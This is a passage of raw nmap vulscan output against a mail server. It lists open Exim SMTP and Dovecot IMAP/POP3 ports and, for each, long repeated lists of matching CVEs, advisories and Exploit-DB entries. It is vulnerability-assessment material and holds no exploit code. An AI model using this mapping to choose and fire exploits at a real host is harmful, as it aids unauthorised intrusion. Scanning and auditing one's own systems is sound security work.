16953| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
16954| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
16955| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
16956| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
16957| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
16958| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
16959| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
16960| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
16961| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
16962| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
16963| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
16964| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
16965| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
16966| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
16967| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
16968| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
16969|
16970| SecurityFocus - https://www.securityfocus.com/bid/:
16971| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
16972| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
16973| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
16974| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
16975| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
16976| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
16977| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
16978| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
16979| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
16980| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
16981| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
16982| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
16983| [45308] Exim Crafted Header Remote Code Execution Vulnerability
16984| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
16985| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
16986| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
16987| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
16988| [17110] sa-exim Unauthorized File Access Vulnerability
16989| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
16990| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
16991| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
16992| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
16993| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
16994| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
16995| [6314] Exim Internet Mailer Format String Vulnerability
16996| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
16997| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
16998| [2828] Exim Format String Vulnerability
16999| [1859] Exim Buffer Overflow Vulnerability
17000|
17001| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17002| [84758] Exim sender_address parameter command execution
17003| [84015] Exim command execution
17004| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
17005| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
17006| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
17007| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
17008| [67455] Exim DKIM processing code execution
17009| [67299] Exim dkim_exim_verify_finish() format string
17010| [65028] Exim open_log privilege escalation
17011| [63967] Exim config file privilege escalation
17012| [63960] Exim header buffer overflow
17013| [59043] Exim mail directory privilege escalation
17014| [59042] Exim MBX symlink
17015| [52922] ikiwiki teximg plugin information disclosure
17016| [34265] Exim spamd buffer overflow
17017| [25286] Sa-exim greylistclean.cron file deletion
17018| [22687] RHSA-2005:025 updates for exim not installed
17019| [18901] Exim dns_build_reverse buffer overflow
17020| [18764] Exim spa_base64_to_bits function buffer overflow
17021| [18763] Exim host_aton buffer overflow
17022| [16079] Exim require_verify buffer overflow
17023| [16077] Exim header_check_syntax buffer overflow
17024| [16075] Exim sender_verify buffer overflow
17025| [13067] Exim HELO or EHLO command heap overflow
17026| [10761] Exim daemon.c format string
17027| [8194] Exim configuration file -c command-line argument buffer overflow
17028| [7738] Exim allows attacker to hide commands in localhost names using pipes
17029| [6671] Exim "
17030| [1893] Exim MTA allows local users to gain root privileges
17031|
17032| Exploit-DB - https://www.exploit-db.com:
17033| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
17034| [15725] Exim 4.63 Remote Root Exploit
17035| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
17036| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
17037| [796] Exim <= 4.42 Local Root Exploit
17038| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
17039|
17040| OpenVAS (Nessus) - http://www.openvas.org:
17041| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
17042|
17043| SecurityTracker - https://www.securitytracker.com:
17044| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
17045| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
17046| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
17047| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
17048| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
17049| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
17050| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
17051| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
17052| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
17053| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
17054| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
17055| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
17056|
17057| OSVDB - http://www.osvdb.org:
17058| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17059| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
17060| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
17061| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
17062| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
17063| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
17064| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
17065| [70696] Exim log.c open_log() Function Local Privilege Escalation
17066| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
17067| [69685] Exim string_format Function Remote Overflow
17068| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
17069| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
17070| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
17071| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
17072| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
17073| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
17074| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
17075| [12726] Exim -be Command Line Option host_aton Function Local Overflow
17076| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
17077| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
17078| [10032] libXpm CreateXImage Function Integer Overflow
17079| [7160] Exim .forward :include: Option Privilege Escalation
17080| [6479] Vexim COOKIE Authentication Credential Disclosure
17081| [6478] Vexim Multiple Parameter SQL Injection
17082| [5930] Exim Parenthesis File Name Filter Bypass
17083| [5897] Exim header_syntax Function Remote Overflow
17084| [5896] Exim sender_verify Function Remote Overflow
17085| [5530] Exim Localhost Name Arbitrary Command Execution
17086| [5330] Exim Configuration File Variable Overflow
17087| [1855] Exim Batched SMTP Mail Header Format String
17088|_
17089587/tcp open smtp syn-ack Exim smtpd
17090| vulscan: VulDB - https://vuldb.com:
17091| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
17092| [109969] Exim 4.88/4.89 SMTP Daemon receive.c bdat_getc denial of service
17093| [109968] Exim 4.88/4.89 SMTP Daemon receive.c receive_msg memory corruption
17094| [94599] Exim up to 4.87 information disclosure
17095| [72414] Avexim Noticias Bebes Beybies 1 X.509 Certificate spoofing
17096| [13422] Exim 4.82 Mail Header dmarc.c expand_string() memory corruption
17097| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
17098| [6989] Mozilla Firefox/Thunderbird 16.0.1/16.0.2 Image Dimension copyTexImage2D memory corruption
17099| [6971] Mozilla Firefox/Thunderbird 16.0.1/16.0.2 texImage2D Call memory corruption
17100| [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt() memory corruption
17101| [5313] Mozilla Firefox up to 11.0 WebGL texImage2D() denial of service
17102| [58841] exim up to 4.69 dkim_exim_verify_finish memory corruption
17103| [57462] Exim up to 4.75 Filesystem memory corruption
17104| [4280] Exim Server 4.x open_log() race condition
17105| [55724] Exim up to 3.14 string.c string_vformat memory corruption
17106|
17107| MITRE CVE - https://cve.mitre.org:
17108| [CVE-2012-5838] The copyTexImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Thunderbird before 17.0, and SeaMonkey before 2.14 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via large image dimensions.
17109| [CVE-2012-5833] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox before 17.0, Firefox ESR 10.x before 10.0.11, Thunderbird before 17.0, Thunderbird ESR 10.x before 10.0.11, and SeaMonkey before 2.14 does not properly interact with Mesa drivers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via function calls involving certain values of the level parameter.
17110| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
17111| [CVE-2012-2140] The Mail gem before 2.4.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a (1) sendmail or (2) exim delivery.
17112| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
17113| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
17114| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
17115| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
17116| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
17117| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
17118| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
17119| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
17120| [CVE-2009-2944] Incomplete blacklist vulnerability in the teximg plugin in ikiwiki before 3.1415926 and 2.x before 2.53.4 allows context-dependent attackers to read arbitrary files via crafted TeX commands.
17121| [CVE-2009-1417] gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and expiration times of X.509 certificates, which allows remote attackers to successfully present a certificate that is (1) not yet valid or (2) no longer valid, related to lack of time checks in the _gnutls_x509_verify_certificate function in lib/x509/verify.c in libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup.
17122| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
17123| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
17124| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
17125| [CVE-2004-2571] Multiple buffer overflows in EnderUNIX isoqlog 2.1.1 allow remote attackers to execute arbitrary code via the (1) parseQmailFromBytesLine, (2) parseQmailToRemoteLine, (3) parseQmailToLocalLine, (4) parseSendmailFromBytesLine, (5) parseSendmailToLine, (6) parseEximFromBytesLine, and (7) parseEximToLine functions in Parser.c
17126| [CVE-2004-0688] Multiple integer overflows in (1) the xpmParseColors function in parse.c, (2) XpmCreateImageFromXpmImage, (3) CreateXImage, (4) ParsePixels, and (5) ParseAndPutPixels for libXpm before 6.8.1 may allow remote attackers to execute arbitrary code via a malformed XPM image file.
17127| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
17128| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
17129| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
17130| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
17131| [CVE-2002-0274] Exim 3.34 and earlier may allow local users to gain privileges via a buffer overflow in long -C (configuration file) and other command line arguments.
17132| [CVE-2001-0889] Exim 3.22 and earlier, in some configurations, does not properly verify the local part of an address when redirecting the address to a pipe, which could allow remote attackers to execute arbitrary commands via shell metacharacters.
17133| [CVE-2001-0690] Format string vulnerability in exim (3.22-10 in Red Hat, 3.12 in Debian and 3.16 in Conectiva) in batched SMTP mode allows a remote attacker to execute arbitrary code via format strings in SMTP mail headers.
17134| [CVE-1999-0971] Buffer overflow in Exim allows local users to gain root privileges via a long :include: option in a .forward file.
17135|
17136| SecurityFocus - https://www.securityfocus.com/bid/:
17137| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
17138| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
17139| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
17140| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
17141| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
17142| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
17143| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17144| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
17145| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
17146| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
17147| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
17148| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
17149| [45308] Exim Crafted Header Remote Code Execution Vulnerability
17150| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
17151| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
17152| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
17153| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
17154| [17110] sa-exim Unauthorized File Access Vulnerability
17155| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
17156| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
17157| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
17158| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
17159| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
17160| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
17161| [6314] Exim Internet Mailer Format String Vulnerability
17162| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
17163| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
17164| [2828] Exim Format String Vulnerability
17165| [1859] Exim Buffer Overflow Vulnerability
17166|
17167| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17168| [84758] Exim sender_address parameter command execution
17169| [84015] Exim command execution
17170| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
17171| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
17172| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
17173| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
17174| [67455] Exim DKIM processing code execution
17175| [67299] Exim dkim_exim_verify_finish() format string
17176| [65028] Exim open_log privilege escalation
17177| [63967] Exim config file privilege escalation
17178| [63960] Exim header buffer overflow
17179| [59043] Exim mail directory privilege escalation
17180| [59042] Exim MBX symlink
17181| [52922] ikiwiki teximg plugin information disclosure
17182| [34265] Exim spamd buffer overflow
17183| [25286] Sa-exim greylistclean.cron file deletion
17184| [22687] RHSA-2005:025 updates for exim not installed
17185| [18901] Exim dns_build_reverse buffer overflow
17186| [18764] Exim spa_base64_to_bits function buffer overflow
17187| [18763] Exim host_aton buffer overflow
17188| [16079] Exim require_verify buffer overflow
17189| [16077] Exim header_check_syntax buffer overflow
17190| [16075] Exim sender_verify buffer overflow
17191| [13067] Exim HELO or EHLO command heap overflow
17192| [10761] Exim daemon.c format string
17193| [8194] Exim configuration file -c command-line argument buffer overflow
17194| [7738] Exim allows attacker to hide commands in localhost names using pipes
17195| [6671] Exim "
17196| [1893] Exim MTA allows local users to gain root privileges
17197|
17198| Exploit-DB - https://www.exploit-db.com:
17199| [25970] Exim sender_address Parameter - RCE Exploit
17200| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
17201| [24093] Exim Sender 3.35 Verification Remote Stack Buffer Overrun Vulnerability
17202| [22066] Exim Internet Mailer 3.35/3.36/4.10 Format String Vulnerability
17203| [20900] Exim 3.x Format String Vulnerability
17204| [20333] Exim Buffer 1.6.2/1.6.51 Overflow Vulnerability
17205| [16925] Exim4 <= 4.69 - string_format Function Heap Buffer Overflow
17206| [15725] Exim 4.63 Remote Root Exploit
17207| [1009] Exim <= 4.41 dns_build_reverse Local Exploit
17208| [812] Exim <= 4.43 auth_spa_server() Remote PoC Exploit
17209| [796] Exim <= 4.42 Local Root Exploit
17210| [756] Exim <= 4.41 dns_build_reverse Local Exploit PoC
17211|
17212| OpenVAS (Nessus) - http://www.openvas.org:
17213| [881419] CentOS Update for exim CESA-2011:0153 centos4 x86_64
17214| [881390] CentOS Update for exim CESA-2011:0153 centos5 x86_64
17215| [881363] CentOS Update for exim CESA-2010:0970 centos4 x86_64
17216| [880502] CentOS Update for exim CESA-2011:0153 centos5 i386
17217| [880468] CentOS Update for exim CESA-2011:0153 centos4 i386
17218| [880458] CentOS Update for exim CESA-2010:0970 centos4 i386
17219| [870379] RedHat Update for exim RHSA-2011:0153-01
17220| [870369] RedHat Update for exim RHSA-2010:0970-01
17221| [864833] Fedora Update for exim FEDORA-2012-17085
17222| [864827] Fedora Update for exim FEDORA-2012-17044
17223| [863098] Fedora Update for exim FEDORA-2011-7047
17224| [863096] Fedora Update for exim FEDORA-2011-7059
17225| [862979] Fedora Update for exim FEDORA-2010-12375
17226| [862146] Fedora Update for exim FEDORA-2010-9506
17227| [862138] Fedora Update for exim FEDORA-2010-9524
17228| [850355] SuSE Update for exim openSUSE-SU-2012:1404-1 (exim)
17229| [850152] SuSE Update for exim SUSE-SA:2010:059
17230| [841201] Ubuntu Update for exim4 USN-1618-1
17231| [840664] Ubuntu Update for exim4 USN-1135-1
17232| [840659] Ubuntu Update for exim4 USN-1130-1
17233| [840582] Ubuntu Update for exim4 vulnerabilities USN-1060-1
17234| [840554] Ubuntu Update for exim4 vulnerability USN-1032-1
17235| [800689] ikiwiki Teximg Plugin TeX Command Arbitrary File Disclosure Vulnerability
17236| [100663] Exim < 4.72 RC2 Multiple Vulnerabilities
17237| [72541] FreeBSD Ports: exim
17238| [72537] Debian Security Advisory DSA 2566-1 (exim4)
17239| [69766] FreeBSD Ports: exim
17240| [69735] Debian Security Advisory DSA 2236-1 (exim4)
17241| [69730] Debian Security Advisory DSA 2232-1 (exim4)
17242| [68948] exim -- local privilege escalation
17243| [68821] FreeBSD Ports: exim
17244| [54809] Gentoo Security Advisory GLSA 200501-23 (exim)
17245| [54567] Gentoo Security Advisory GLSA 200405-07 (Exim)
17246| [53811] Debian Security Advisory DSA 058-1 (exim)
17247| [53662] Debian Security Advisory DSA 376-1 (exim exim-tls)
17248| [53474] Debian Security Advisory DSA 637-1 (exim-tls)
17249| [53472] Debian Security Advisory DSA 635-1 (exim)
17250| [53385] Debian Security Advisory DSA 097-1 (exim)
17251| [53192] Debian Security Advisory DSA 502-1 (exim-tls)
17252| [53191] Debian Security Advisory DSA 501-1 (exim)
17253| [52466] FreeBSD Ports: exim, exim-ldap2, exim-mysql, exim-postgresql
17254| [52252] exim -- two buffer overflow vulnerabilities
17255|
17256| SecurityTracker - https://www.securitytracker.com:
17257| [1025539] Exim DKIM Processing Flaw Lets Remote Users Execute Arbitrary Code
17258| [1025504] Exim DKIM Signature Format String Flaw Lets Remote Users Execute Arbitrary Code
17259| [1024859] Exim Configuration File Capability Lets Local Users Gain Elevated Privileges
17260| [1024858] Exim Buffer Overfow in string_format() Lets Remote Users Execute Arbitrary Code
17261| [1012904] Exim Buffer Overflow in dns_build_reverse() Lets Local Users Obtain Elevated Privileges
17262| [1012771] Exim Buffer Overflows in host_aton() and spa_base64_to_bits() May Let Local Users Gain Elevated Privileges
17263| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
17264| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
17265| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
17266| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
17267| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
17268| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
17269|
17270| OSVDB - http://www.osvdb.org:
17271| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
17272| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
17273| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
17274| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
17275| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
17276| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
17277| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
17278| [70696] Exim log.c open_log() Function Local Privilege Escalation
17279| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
17280| [69685] Exim string_format Function Remote Overflow
17281| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
17282| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
17283| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
17284| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
17285| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
17286| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
17287| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
17288| [12726] Exim -be Command Line Option host_aton Function Local Overflow
17289| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
17290| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
17291| [10032] libXpm CreateXImage Function Integer Overflow
17292| [7160] Exim .forward :include: Option Privilege Escalation
17293| [6479] Vexim COOKIE Authentication Credential Disclosure
17294| [6478] Vexim Multiple Parameter SQL Injection
17295| [5930] Exim Parenthesis File Name Filter Bypass
17296| [5897] Exim header_syntax Function Remote Overflow
17297| [5896] Exim sender_verify Function Remote Overflow
17298| [5530] Exim Localhost Name Arbitrary Command Execution
17299| [5330] Exim Configuration File Variable Overflow
17300| [1855] Exim Batched SMTP Mail Header Format String
17301|_
17302993/tcp open ssl/imap syn-ack
17303| fingerprint-strings:
17304| NULL:
17305|_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
17306995/tcp open ssl/pop3 syn-ack Dovecot DirectAdmin pop3d
17307| vulscan: VulDB - https://vuldb.com:
17308| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
17309| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
17310| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
17311| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
17312| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
17313| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
17314| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
